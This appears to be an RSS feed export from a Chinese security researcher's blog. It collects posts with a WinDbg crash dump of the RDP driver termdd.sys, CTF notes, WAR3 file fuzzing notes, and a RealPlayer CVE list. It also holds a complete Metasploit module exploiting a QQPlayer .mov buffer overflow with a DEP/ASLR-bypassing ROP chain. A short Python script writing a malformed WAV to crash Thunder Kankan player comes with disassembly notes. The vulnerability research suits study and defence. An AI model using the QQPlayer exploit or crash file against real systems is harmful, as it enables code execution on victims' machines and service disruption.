b43d9a78 939a4f68 termdd!_IcaCallStack+0&#215;57<br />
b43d9ac0 939a2e91 termdd!IcaDeviceControlStack+0&#215;466<br />
b43d9af0 939a3065 termdd!IcaDeviceControl+0&#215;59<br />
b43d9b08 8484f4bc termdd!IcaDispatch+0x13f<br />
b43d9b20 84a5144e nt!IofCallDriver+0&#215;63<br />
b43d9b40 84a6e23f nt!IopSynchronousServiceTail+0x1f8<br />
b43d9bdc 84a70a1a nt!IopXxxControlFile+0x6aa<br />
b43d9c10 855d0e7d nt!NtDeviceIoControlFile+0x2a<br />
WARNING: Stack unwind information not available. Following frames may be wrong.<br />
b43d9d04 8485648a Hookport+0x4e7d<br />
b43d9d04 775d6194 nt!KiFastCallEntry+0x12a<br />
02f0e7e8 00000000 0x775d6194<br />
1: kd> r<br />
eax=0a0b05ff ebx=a431f8f0 ecx=00000151 edx=00640075 esi=0a0b05ff edi=d7abdb00<br />
eip=939a0987 esp=b43d9878 ebp=b43d9884 iopl=0         nv up ei pl nz na pe nc<br />
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010206<br />
termdd!IcaBufferAllocEx+0x1b:<br />
939a0987 8b4618          mov     eax,dword ptr [esi+18h] ds:0023:0a0b0617=????????<br />
1: kd> !analyze -v<br />
*******************************************************************************<br />
*                                                                             *<br />
*                        Bugcheck Analysis                                    *<br />
*                                                                             *<br />
*******************************************************************************</p>
<p>KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e)<br />
This is a very common bugcheck.  Usually the exception address pinpoints<br />
the driver/function that caused the problem.  Always note this address<br />
as well as the link date of the driver/image that contains this address.<br />
Some common problems are exception code 0&#215;80000003.  This means a hard<br />
coded breakpoint or assertion was hit, but this system was booted<br />
/NODEBUG.  This is not supposed to happen as developers should never have<br />
hardcoded breakpoints in retail code, but &#8230;<br />
If this happens, make sure a debugger gets connected, and the<br />
system is booted /DEBUG.  This will let us see why this breakpoint is<br />
happening.<br />
Arguments:<br />
Arg1: c0000005, The exception code that was not handled<br />
Arg2: 939a0987, The address that the exception occurred at<br />
Arg3: b43d9804, Trap Frame<br />
Arg4: 00000000</p>
<p>Debugging Details:<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>EXCEPTION_CODE: (NTSTATUS) 0xc0000005 &#8211; 0x%08lx</p>
<p>FAULTING_IP:<br />
termdd!IcaBufferAllocEx+1b<br />
939a0987 8b4618          mov     eax,dword ptr [esi+18h]</p>
<p>TRAP_FRAME:  b43d9804 &#8212; (.trap 0xffffffffb43d9804)<br />
ErrCode = 00000000<br />
eax=0a0b05ff ebx=a431f8f0 ecx=00000151 edx=00640075 esi=0a0b05ff edi=d7abdb00<br />
eip=939a0987 esp=b43d9878 ebp=b43d9884 iopl=0         nv up ei pl nz na pe nc<br />
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010206<br />
termdd!IcaBufferAllocEx+0x1b:<br />
939a0987 8b4618          mov     eax,dword ptr [esi+18h] ds:0023:0a0b0617=????????<br />
Resetting default scope</p>
<p>CUSTOMER_CRASH_COUNT:  1</p>
<p>DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT</p>
<p>BUGCHECK_STR:  0x8E</p>
<p>PROCESS_NAME:  svchost.exe</p>
<p>CURRENT_IRQL:  0</p>
<p>LAST_CONTROL_TRANSFER:  from a4a11232 to 939a0987</p>
<p>STACK_TEXT:<br />
b43d9884 a4a11232 d7abdb00 00000000 00d800b1 termdd!IcaBufferAllocEx+0x1b<br />
b43d98a4 a4a2b405 d7abdb00 00000000 00d800b1 RDPWD!WDICART_IcaBufferAllocEx+0&#215;24<br />
b43d98c8 a4a2b46e b7a30c88 d7abdb00 00000000 RDPWD!StackBufferAllocEx+0x5c<br />
b43d98f4 a4a1c722 c1edd270 00000010 a431f604 RDPWD!MCSDetachUserRequest+0&#215;29<br />
b43d9908 a4a170ff a431f8f0 b43d9920 a4a1666c RDPWD!NMDetachUserReq+0&#215;14<br />
b43d9914 a4a1666c a431f8f0 b43d9930 a4a1c821 RDPWD!NM_Disconnect+0&#215;16<br />
b43d9920 a4a1c821 a431f604 a431f8f0 b43d9950 RDPWD!SM_Disconnect+0&#215;27<br />
b43d9930 a4a1c762 a431f604 00000000 00000001 RDPWD!SM_OnConnected+0&#215;70<br />
b43d9950 a4a174d3 a431f8f0 00000002 a431f604 RDPWD!NMAbortConnect+0&#215;23<br />
b43d9990 a4a16f3c 0031f8f0 00000001 a431f3fe RDPWD!NM_Connect+0&#215;68<br />
b43d99b0 a4a14f64 a431f604 89e8cdc0 89e8cdcc RDPWD!SM_Connect+0x11d<br />
b43d99ec a4a15764 a431f008 89e8ccdc 89e8cdc0 RDPWD!WDWConnect+0&#215;557<br />
b43d9a28 a4a108df a431f008 00000000 87a11260 RDPWD!WDLIB_TShareConfConnect+0xa0<br />
b43d9a3c 939a45f1 a431f008 b43d9a98 8a6f0678 RDPWD!WDSYS_Ioctl+0x6c9<br />
b43d9a58 939a4aa9 87a11260 00000005 b43d9a98 termdd!_IcaCallSd+0&#215;37<br />
b43d9a78 939a4f68 8a6f0670 00000005 b43d9a98 termdd!_IcaCallStack+0&#215;57<br />
b43d9ac0 939a2e91 8a6f0670 86eb0798 86eb0808 termdd!IcaDeviceControlStack+0&#215;466<br />
b43d9af0 939a3065 86eb0798 86eb0808 87a4a038 termdd!IcaDeviceControl+0&#215;59<br />
b43d9b08 8484f4bc 87fe48f8 86eb0798 86eb0798 termdd!IcaDispatch+0x13f<br />
b43d9b20 84a5144e 87a4a038 86eb0798 86eb0808 nt!IofCallDriver+0&#215;63<br />
b43d9b40 84a6e23f 87fe48f8 87a4a038 00000000 nt!IopSynchronousServiceTail+0x1f8<br />
b43d9bdc 84a70a1a 87fe48f8 86eb0798 00000000 nt!IopXxxControlFile+0x6aa<br />
b43d9c10 855d0e7d 00000754 00000000 00000000 nt!NtDeviceIoControlFile+0x2a<br />
WARNING: Stack unwind information not available. Following frames may be wrong.<br />
b43d9d04 8485648a 00000754 00000000 00000000 Hookport+0x4e7d<br />
b43d9d04 775d6194 00000754 00000000 00000000 nt!KiFastCallEntry+0x12a<br />
02f0e7e8 00000000 00000000 00000000 00000000 0x775d6194</p>
<p>STACK_COMMAND:  kb</p>
<p>FOLLOWUP_IP:<br />
termdd!IcaBufferAllocEx+1b<br />
939a0987 8b4618          mov     eax,dword ptr [esi+18h]</p>
<p>SYMBOL_STACK_INDEX:  0</p>
<p>SYMBOL_NAME:  termdd!IcaBufferAllocEx+1b</p>
<p>FOLLOWUP_NAME:  MachineOwner</p>
<p>MODULE_NAME: termdd</p>
<p>IMAGE_NAME:  termdd.sys</p>
<p>DEBUG_FLR_IMAGE_TIMESTAMP:  4a5bcadf</p>
<p>FAILURE_BUCKET_ID:  0x8E_termdd!IcaBufferAllocEx+1b</p>
<p>BUCKET_ID:  0x8E_termdd!IcaBufferAllocEx+1b</p>
<p>Followup: MachineOwner<br />
&#8212;&#8212;&#8212;</p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2012/01/2012/' rel='bookmark' title='Permanent Link: 2012'>2012</a></li>
<li><a href='http://cq-cser.cn/2012/05/simple-version-of-2012-0158/' rel='bookmark' title='Permanent Link: simple version of 2012-0158'>simple version of 2012-0158</a></li>
<li><a href='http://cq-cser.cn/2011/10/darungrim/' rel='bookmark' title='Permanent Link: darungrim'>darungrim</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2012/03/2012-0002/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>FUNNY POSTS</title>
		<link>http://cq-cser.cn/2012/03/funny-posts/</link>
		<comments>http://cq-cser.cn/2012/03/funny-posts/#comments</comments>
		<pubDate>Fri, 02 Mar 2012 09:03:01 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[其他]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1544</guid>
		<description><![CDATA[http://gdtr.wordpress.com/2012/02/22/exploiting-cve-2011-2371-without-non-aslr-modules/ https://www.corelan.be/index.php/2012/02/29/debugging-fun-putting-a-process-to-sleep/ 内存补丁 http://ifsec.blogspot.com/2011/06/memory-disclosure-technique-for.html 信息泄露，基质查找技术 通过覆盖JAVASRIPT内存结构的长度，完成读取不应该读取的内存 http://leetmore.ctf.su/CODEGATE2012 BIN500  2层VM解码+PYTHON解码。其实只用带一个就OK。。作者小粗心了下。。 BIN400 好怀念，，此处为暴力模拟键盘，autohotkey script,nice！ BIN300就是UNPACK+分析+识别 for500 又见trid,参见mark0.net/soft-trid-e.html 最近觉得BIN什么的也蛮好玩啦，VUL出题的话太难了。 No related posts.


No related posts.]]></description>
			<content:encoded><![CDATA[<p><a href="http://gdtr.wordpress.com/2012/02/22/exploiting-cve-2011-2371-without-non-aslr-modules/">http://gdtr.wordpress.com/2012/02/22/exploiting-cve-2011-2371-without-non-aslr-modules/</a></p>
<p><a href="https://www.corelan.be/index.php/2012/02/29/debugging-fun-putting-a-process-to-sleep/">https://www.corelan.be/index.php/2012/02/29/debugging-fun-putting-a-process-to-sleep/</a></p>
<p>内存补丁</p>
<p><a href="http://ifsec.blogspot.com/2011/06/memory-disclosure-technique-for.html">http://ifsec.blogspot.com/2011/06/memory-disclosure-technique-for.html</a></p>
<p>信息泄露，基质查找技术</p>
<p>通过覆盖JAVASRIPT内存结构的长度，完成读取不应该读取的内存</p>
<p><a href="http://leetmore.ctf.su/">http://leetmore.ctf.su/</a>CODEGATE2012</p>
<p>BIN500  2层VM解码+PYTHON解码。其实只用带一个就OK。。作者小粗心了下。。</p>
<p>BIN400 好怀念，，此处为暴力模拟键盘，autohotkey script,nice！</p>
<p>BIN300就是UNPACK+分析+识别</p>
<p>for500 又见trid,参见mark0.net/soft-trid-e.html</p>
<p>最近觉得BIN什么的也蛮好玩啦，VUL出题的话太难了。</p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2012/03/funny-posts/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>2012</title>
		<link>http://cq-cser.cn/2012/01/2012/</link>
		<comments>http://cq-cser.cn/2012/01/2012/#comments</comments>
		<pubDate>Sun, 15 Jan 2012 08:17:54 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[其他]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1540</guid>
		<description><![CDATA[新年快到了，昨天到家了，整理下最近买的，强的，别人送的 各种怀念啊！ 新年要有新计划，还是写下来约束力大点。 1.OS,BROWSER,MUTIL PLAYER 3个重点方向要有成果 2.完善理论，开发自用工具，向大虾学习。 3.忘记一些东东，稳定下来，培养新习惯。 4.实践新技术方向 Related posts:2012-0002 simple version of 2012-0158


Related posts:<ol><li><a href='http://cq-cser.cn/2012/03/2012-0002/' rel='bookmark' title='Permanent Link: 2012-0002'>2012-0002</a></li>
<li><a href='http://cq-cser.cn/2012/05/simple-version-of-2012-0158/' rel='bookmark' title='Permanent Link: simple version of 2012-0158'>simple version of 2012-0158</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><span id="more-1540"></span>新年快到了，昨天到家了，整理下最近买的，强的，别人送的</p>
<p style="text-align: center;"><a href="http://cq-cser.cn/wp-content/uploads/2012/01/CIMG3346.jpg"><img class="aligncenter size-large wp-image-1541" title="CIMG3346" src="http://cq-cser.cn/wp-content/uploads/2012/01/CIMG3346-1024x768.jpg" alt="" width="614" height="461" /></a></p>
<p style="text-align: left;">各种怀念啊！</p>
<p style="text-align: left;">新年要有新计划，还是写下来约束力大点。</p>
<p style="text-align: left;">1.OS,BROWSER,MUTIL PLAYER 3个重点方向要有成果</p>
<p style="text-align: left;">2.完善理论，开发自用工具，向大虾学习。</p>
<p style="text-align: left;">3.忘记一些东东，稳定下来，培养新习惯。</p>
<p style="text-align: left;">4.实践新技术方向</p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2012/03/2012-0002/' rel='bookmark' title='Permanent Link: 2012-0002'>2012-0002</a></li>
<li><a href='http://cq-cser.cn/2012/05/simple-version-of-2012-0158/' rel='bookmark' title='Permanent Link: simple version of 2012-0158'>simple version of 2012-0158</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2012/01/2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WAR3格式</title>
		<link>http://cq-cser.cn/2011/12/war3%e6%a0%bc%e5%bc%8f/</link>
		<comments>http://cq-cser.cn/2011/12/war3%e6%a0%bc%e5%bc%8f/#comments</comments>
		<pubDate>Mon, 12 Dec 2011 09:13:46 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[sec]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1534</guid>
		<description><![CDATA[本来是考虑w3g格式的 参见如下 http://w3g.deepnode.de/files/w3g_format.txt 大致包含部分： 版本头 压缩数据 解压出来包含各类时间，动作等。用的是ZLIB解压 ///////////////////////////////////////////////////////////////////////////////////////////////////// 后来想了下，用录像不如用地图，随便打开一个 00000000h: 48 4D 33 57 00 00 00 00 E5 8F AA E6 98 AF E5 8F ; HM3W&#8230;.鍙槸鍙 00000010h: A6 E5 A4 96 E4 B8 80 E5 BC A0 E9 AD 94 E5 85 BD ; ﹀涓€寮犻瓟鍏? 00000020h: E4 BA 89 E9 9C B8 49 [...]


No related posts.]]></description>
			<content:encoded><![CDATA[<p>本来是考虑w3g格式的<br />
参见如下</p>
<p>http://w3g.deepnode.de/files/w3g_format.txt</p>
<p>大致包含部分：<br />
版本头<br />
压缩数据</p>
<p>解压出来包含各类时间，动作等。用的是ZLIB解压<br />
/////////////////////////////////////////////////////////////////////////////////////////////////////<br />
后来想了下，用录像不如用地图，随便打开一个</p>
<div id="_mcePaste">00000000h: 48 4D 33 57 00 00 00 00 E5 8F AA E6 98 AF E5 8F ; HM3W&#8230;.鍙槸鍙</div>
<div id="_mcePaste">00000010h: A6 E5 A4 96 E4 B8 80 E5 BC A0 E9 AD 94 E5 85 BD ; ﹀涓€寮犻瓟鍏?</div>
<div id="_mcePaste">00000020h: E4 BA 89 E9 9C B8 49 49 49 E7 9A 84 E5 9C B0 E5 ; 浜夐湼III鐨勫湴?</div>
<div id="_mcePaste">00000030h: 9B BE 00 14 9C 00 00 01 00 00 00 00 00 00 00 00 ; 浘..?&#8230;&#8230;&#8230;.</div>
<div id="_mcePaste">00000040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; &#8230;&#8230;&#8230;&#8230;&#8230;.</div>
<div>
<div>00000200h: 4D 50 51 1A 20 00 00 00 12 34 56 78 11 11 11 11 ; MPQ. &#8230;.4Vx&#8230;.</div>
<div>00000210h: A1 38 00 00 A1 3C 00 00 40 00 00 00 10 00 00 00 ; ?..?..@&#8230;&#8230;.</div>
<div>00000220h: 24 00 00 00 8D 02 00 00 BF 04 00 00 FE 06 00 00 ; $&#8230;?..?..?..</div>
<div>00000230h: 25 09 00 00 54 0B 00 00 85 0D 00 00 93 0F 00 00 ; %&#8230;T&#8230;?..?..</div>
</div>
<div>猜测下包含文件头和MPQ2部分，我们随便修改下MPQ后面的数字，如上，1234567811111111，用WAR3打开，果然CRASH了哈，一次是内存不够，一次是异常。大胆猜测，直接读取值开辟空间？</div>
<div><span id="more-1534"></span></div>
<div>WAR3应该是VC6的老编译器的吧。作为一个忠实真三DOTA爱好者，唉</div>
<div>////////////////////////////////////////////////////////////</div>
<div>再来看最近的几个scada的 ，不管是溢出还是use-after-free，某人的入手点很好啊，从注册类型PROJECT文件处理入手。</div>
<div>////////////////////////////////////////////////////////////</div>
<div>另，REALPLAYER一次补了好多洞啊</div>
<div>
<div>REALPLAYER  QCP,AAC,MP3,SWF，RealAudio sipr  漏洞</div>
<div>CVE-2011-2945</div>
<div>RealPlayer SIPR Heap Buffer Overflow Vulnerability   （out of bound）http://wiki.multimedia.cx/index.php?title=RealAudio_sipr</div>
<div>CVE-2011-2946</div>
<div>RealPlayer ActiveX Remote Code Execution Vulnerability</div>
<div>CVE-2011-2947</div>
<div>RealPlayer Cross-Zone Scripting Remote Code Execution Vulnerability</div>
<div>CVE-2011-2952</div>
<div>RealPlayer Dialog Box Use After Free Vulnerability</div>
<div>CVE-2011-2953</div>
<div>RealPlayer ActiveX Browser Plugin Out of Bounds Vulnerability.</div>
<div>CVE-2011-2954</div>
<div>RealPlayer Embedded AutoUpdate Use After Free Vulnerability</div>
<div>CVE-2011-2955</div>
<div>RealPlayer Embedded Modal Dialog Use After Free Vulnerability</div>
<div>CVE-2011-1221</div>
<div>RealPlayer Cross-Zone Scripting Remote Code Execution Vulnerability</div>
</div>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/12/war3%e6%a0%bc%e5%bc%8f/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS</title>
		<link>http://cq-cser.cn/2011/11/qqplayer-pict-pnsize-buffer-overflow-win7-dep_aslr-bypass/</link>
		<comments>http://cq-cser.cn/2011/11/qqplayer-pict-pnsize-buffer-overflow-win7-dep_aslr-bypass/#comments</comments>
		<pubDate>Mon, 21 Nov 2011 08:26:22 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[其他]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1531</guid>
		<description><![CDATA[http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/qqplayer.rb 样本： http://115.com/file/cl3naedv http://115.com/file/aqu3qzmk # Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS # Date: 2011,11,21 # Author: hellok(warptencq[at]gmail.com) # Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe # Version: 32_845(lastest) # Tested on: WIN7 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS', [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2012/05/simple-version-of-2012-0158/' rel='bookmark' title='Permanent Link: simple version of 2012-0158'>simple version of 2012-0158</a></li>
<li><a href='http://cq-cser.cn/2012/04/feiq2008-2-5-0-0/' rel='bookmark' title='Permanent Link: feiq2008.2.5.0.0'>feiq2008.2.5.0.0</a></li>
<li><a href='http://cq-cser.cn/2011/11/what_ever/' rel='bookmark' title='Permanent Link: 记事'>记事</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><a href="http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/qqplayer.rb">http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/qqplayer.rb</a><br />
样本：</p>
<p>http://115.com/file/cl3naedv</p>
<p>http://115.com/file/aqu3qzmk</p>
<p><code># Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS<br />
# Date: 2011,11,21<br />
# Author: hellok(warptencq[at]gmail.com)<br />
# Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe<br />
# Version: 32_845(lastest)<br />
# Tested on: WIN7<span id="more-1531"></span><br />
require 'msf/core'<br />
class Metasploit3 < Msf::Exploit::Remote<br />
	include Msf::Exploit::FILEFORMAT</p>
<p>	def initialize(info = {})<br />
		super(update_info(info,<br />
			'Name'           => 'QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS',<br />
			'Description'    => %q{<br />
					This module exploits a vulnerability in QQPLAYER Player 3.2.<br />
				When opening a .mov file containing a specially crafted PnSize value, an attacker<br />
				may be able to execute arbitrary code.<br />
			},<br />
			'License'        => MSF_LICENSE,<br />
			'Author'         =><br />
				[<br />
					'hellok',  #special thank corelanc0d3r for 'mona'<br />
				],<br />
			'References'     =><br />
				[<br />
				],<br />
			'DefaultOptions' =><br />
				{<br />
					'EXITFUNC' => 'process',<br />
					'DisablePayloadHandler' => 'true',<br />
				},<br />
			'Payload'        =><br />
				{<br />
					'Space'          => 750,<br />
					'BadChars'       => "",  #Memcpy<br />
					'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,<br />
					'DisableNops'    =>  'True',<br />
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",<br />
					'EncoderOptions' =><br />
						{<br />
							'BufferRegister' => 'ECX',<br />
						},<br />
				},<br />
			'Platform' => 'win',<br />
			'Targets'        =><br />
				[<br />
					[ 'Windows 7', { 'Ret' => 0x67664cde } ],<br />
				],<br />
			'Privileged'     => false,<br />
			'DisclosureDate' => '11 21 2011',<br />
			'DefaultTarget'  => 0))</p>
<p>		register_options(<br />
			[<br />
				OptString.new('FILENAME',   [ false, 'The file name.',  'msf.mov' ]),<br />
			], self.class)<br />
	end<br />
	def exploit<br />
		# !mona rop<br />
		rop_gadgets =<br />
		[</p>
<p>			0x00418007,	# POP ECX # RETN (QQPlayer.exe)<br />
			0x12345678,<br />
			0x67664CE4,<br />
			0x01020304,<br />
			0x10203040,<br />
			0x22331122,<br />
			0x23456789,</p>
<p>			0x00418007,	# POP ECX # RETN (QQPlayer.exe)<br />
			0x00a9c18c,	# <- *&#038;VirtualProtect()<br />
			0x0054f100,	# MOV EAX,DWORD PTR DS:[ECX] # RETN (QQPlayer.exe)<br />
			#0x008e750c, LEA ESI,EAX # RETN (QQPlayer.exe)<br />
			0x008cf099,	# XCHG EAX,ESI # RETN</p>
<p>			0x6497aaad,	# POP EBP # RETN (avformat-52.dll)<br />
			0x100272bf,	# ptr to 'call esp' (from i18nu.dll)<br />
			0x005fc00b,	# POP EBX # RETN (QQPlayer.exe)<br />
			0x00000331,	# <- change size to mark as executable if needed (-> ebx)<br />
			0x00418007,	# POP ECX # RETN (QQPlayer.exe)<br />
			0x63d18000,	# RW pointer (lpOldProtect) (-> ecx)<br />
			0x63d05001,	# POP EDI # RETN (avutil-49.dll)<br />
			0x63d05002,	# ROP NOP (-> edi)<br />
			0x008bf00b,	# POP EDX # RETN (QQPlayer.exe)<br />
			0x00000040,	# newProtect (0x40) (-> edx)<br />
			0x00468800,	# POP EAX # RETN (QQPlayer.exe)<br />
			0x90909090,	# NOPS (-> eax)<br />
			0x008bad5c,	# PUSHAD # RETN (QQPlayer.exe)<br />
		# rop chain generated by mona.py<br />
		# note : this chain may not work out of the box<br />
		# you may have to change order or fix some gadgets,<br />
		# but it should give you a head start<br />
		].pack("V*")</p>
<p>		stackpivot = [target.ret].pack('L')</p>
<p>		buffer =rand_text_alpha_upper(90)#2<br />
		buffer << rop_gadgets<br />
		buffer << payload.encoded</p>
<p>		junk = rand_text_alpha_upper(2306 - buffer.length)</p>
<p>		buffer << junk<br />
		buffer << stackpivot<br />
		buffer << rand_text_alpha_upper(3000)#3000</p>
<p>		path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" )<br />
		fd = File.open(path, "rb" )<br />
		sploit = fd.read(fd.stat.size)<br />
		fd.close</p>
<p>		sploit << buffer</p>
<p>		file_create(sploit)<br />
	end<br />
end<br />
</code></p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2012/05/simple-version-of-2012-0158/' rel='bookmark' title='Permanent Link: simple version of 2012-0158'>simple version of 2012-0158</a></li>
<li><a href='http://cq-cser.cn/2012/04/feiq2008-2-5-0-0/' rel='bookmark' title='Permanent Link: feiq2008.2.5.0.0'>feiq2008.2.5.0.0</a></li>
<li><a href='http://cq-cser.cn/2011/11/what_ever/' rel='bookmark' title='Permanent Link: 记事'>记事</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/11/qqplayer-pict-pnsize-buffer-overflow-win7-dep_aslr-bypass/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>thunder_kankan_stack_overflow/dos exploit</title>
		<link>http://cq-cser.cn/2011/11/kankan-stackoverflowdos-exploit/</link>
		<comments>http://cq-cser.cn/2011/11/kankan-stackoverflowdos-exploit/#comments</comments>
		<pubDate>Thu, 17 Nov 2011 14:56:32 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[sec]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1522</guid>
		<description><![CDATA[http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/kankan.py print &#8220;&#8221;" #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 #0      ___           ___           ___       ___       ___           ___     1 #1     /\__\         /\  \         /\__\     /\__\ [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2010/01/internet-explorer-aurora-exploit/' rel='bookmark' title='Permanent Link: Internet Explorer Aurora Exploit'>Internet Explorer Aurora Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/01/zzrising-antivirus-200820092010-local-privilege-escalation-exploit/' rel='bookmark' title='Permanent Link: [zz]Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit'>[zz]Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/09/%e5%85%b3%e4%ba%8eesp%e5%ae%9a%e5%be%8b/' rel='bookmark' title='Permanent Link: 关于esp定律'>关于esp定律</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div id="_mcePaste">
<div id="_mcePaste"><a href="http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/kankan.py">http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/kankan.py</a></div>
<div>print &#8220;&#8221;"</div>
<div id="_mcePaste">#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0</div>
<div id="_mcePaste">#0      ___           ___           ___       ___       ___           ___     1</div>
<div id="_mcePaste">#1     /\__\         /\  \         /\__\     /\__\     /\  \         /\__\    0</div>
<div id="_mcePaste">#0    /:/  /        /::\  \       /:/  /    /:/  /    /::\  \       /:/  /    1</div>
<div id="_mcePaste">#1   /:/__/        /:/\:\  \     /:/  /    /:/  /    /:/\:\  \     /:/__/     0</div>
<div id="_mcePaste">#0  /::\  \ ___   /::\~\:\  \   /:/  /    /:/  /    /:/  \:\  \   /::\__\____ 1</div>
<div id="_mcePaste">#1 /:/\:\  /\__\ /:/\:\ \:\__\ /:/__/    /:/__/    /:/__/ \:\__\ /:/\:::::\__\0</div>
<div id="_mcePaste">#0 \/__\:\/:/  / \:\~\:\ \/__/ \:\  \    \:\  \    \:\  \ /:/  / \/_|:|~~|~   1</div>
<div id="_mcePaste">#1      \::/  /   \:\ \:\__\    \:\  \    \:\  \    \:\  /:/  /     |:|  |    0</div>
<div id="_mcePaste">#0      /:/  /     \:\ \/__/     \:\  \    \:\  \    \:\/:/  /      |:|  |    1</div>
<div id="_mcePaste">#1     /:/  /       \:\__\        \:\__\    \:\__\    \::/  /       |:|  |    0</div>
<div id="_mcePaste">#0     \/__/         \/__/         \/__/     \/__/     \/__/         \|__|    1</div>
<div id="_mcePaste">#1                                                                            0</div>
<div id="_mcePaste">#0  [+] Exploit Title: Thunder kankan player Stack overflow/DOS Exploit       1</div>
<div id="_mcePaste">#1  [+] Software Link: dl.xunlei.com/xmp.html                                 0</div>
<div id="_mcePaste">#0  [+] Software:  Thunder kankan player                                      1</div>
<div id="_mcePaste">#1  [+] Version :   4.8.3.840(last)                                           0</div>
<div id="_mcePaste">#0  [+] Tested On:  WIN 7                                                     1</div>
<div id="_mcePaste">#1  [+] Code by:  hellok(warptencq@gmail.com)                                 0</div>
<div id="_mcePaste">#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-1</div>
<div id="_mcePaste">&#8220;&#8221;"</div>
<div id="_mcePaste">filepath = &#8220;exploit.wav&#8221;</div>
<div id="_mcePaste">f = open(filepath, &#8220;wb&#8221;)</div>
<div id="_mcePaste">file = &#8216;\x52\x49\x46\x46\x62\xb8\x20\x20\x57\x41\x56\x45\x66\x6d\x74\x20&#8242;</div>
<div id="_mcePaste">f.write(file)</div>
<div id="_mcePaste">f.close()</div>
<div id="_mcePaste">print &#8220;Done..&#8221;</div>
</div>
<p><span id="more-1522"></span><br />
主要2出错误，都是没校验直接从文件中读出。<br />
bass_wv.dll中的<br />
seg002:10005C2D ; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
seg002:10005C2D ; 148: clean_junk_part:<br />
seg002:10005C2D ; 149:         v17 = malloc(site_malloc_may_error);<br />
seg002:10005C2D<br />
seg002:10005C2D clean_junk_part:                        ; CODE XREF: seem_important+1BDj<br />
seg002:10005C2D                                         ; seem_important+245j<br />
seg002:10005C2D                 push    esi             ; Size<br />
seg002:10005C2E                 call    malloc          ;  /size = F2471B06 (-230221050.)可控<br />
seg002:10005C34 ; 150:         (**(memory1 + 112))(*(memory1 + 116), v17, site_malloc_may_error);// basedll(+116)<br />
seg002:10005C34                 mov     ecx, [ebp+74h]  ; 申请失败，导致EAX==00<br />
seg002:10005C37                 add     esp, 4<br />
seg002:10005C3A                 mov     edi, eax        ; eax==0000  污染源<br />
seg002:10005C3C                 mov     eax, [ebp+70h]<br />
seg002:10005C3F                 push    esi<br />
